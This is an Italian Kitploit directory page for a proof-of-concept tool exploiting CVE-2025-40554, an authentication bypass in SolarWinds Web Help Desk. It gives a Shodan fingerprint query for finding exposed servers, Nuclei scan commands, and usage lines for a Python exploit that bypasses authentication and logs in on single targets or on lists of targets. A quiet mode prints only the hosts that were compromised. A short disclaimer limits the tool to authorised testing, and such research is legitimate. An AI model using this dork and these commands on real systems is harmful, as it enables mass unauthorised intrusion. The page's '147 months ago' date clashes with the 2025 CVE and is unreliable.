Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
auth-bypass-CVE-2025-40554 — Proof-of-concept per CVE-2025-40554, un bypass dell'autenticazione in SolarWinds Web Help Desk. Include un template per Nuclei e un exploit Python per test su singoli o batch di bersagli con login opzionale tramite credenziali. | Kitploit
Strumenti/GitHubGitHub/imbas007/auth-bypass-cve-2025-40554
Autenticazione e AutorizzazioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubimbas007/auth-bypass-cve-2025-40554

auth-bypass-CVE-2025-40554

Proof-of-concept per CVE-2025-40554, un bypass dell'autenticazione in SolarWinds Web Help Desk. Include un template per Nuclei e un exploit Python per test su singoli o batch di bersagli con login opzionale tramite credenziali.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
147 mesi faNon ancora revisionato

CVE-2025-40554 – SolarWinds Web Help Desk Bypass Autenticazione PoC

Query Shodan

root@kitploit:~
http.favicon.hash:"1895809524"

Nuclei

root@kitploit:~
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
root@kitploit:~
pip install -r requirements.txt

Utilizzo

Singolo target (bypass + login, default client/client):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443
immagine

Singolo target con credenziali personalizzate:

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass

Singolo target, solo bypass (nessun login):

root@kitploit:~
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login

Lista di target (salva solo vulnerabili+login):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt

Lista di target con credenziali personalizzate:

root@kitploit:~
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret

Modalità silenziosa (stampa solo URL dove il login ha avuto successo):

root@kitploit:~
python3 exploit_auth_bypass.py -l result_all.txt -q

Dichiarazione di non responsabilità

Questo PoC è solo per ricerca e test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Gli autori non sono responsabili per l'uso improprio.

Scarica lo strumento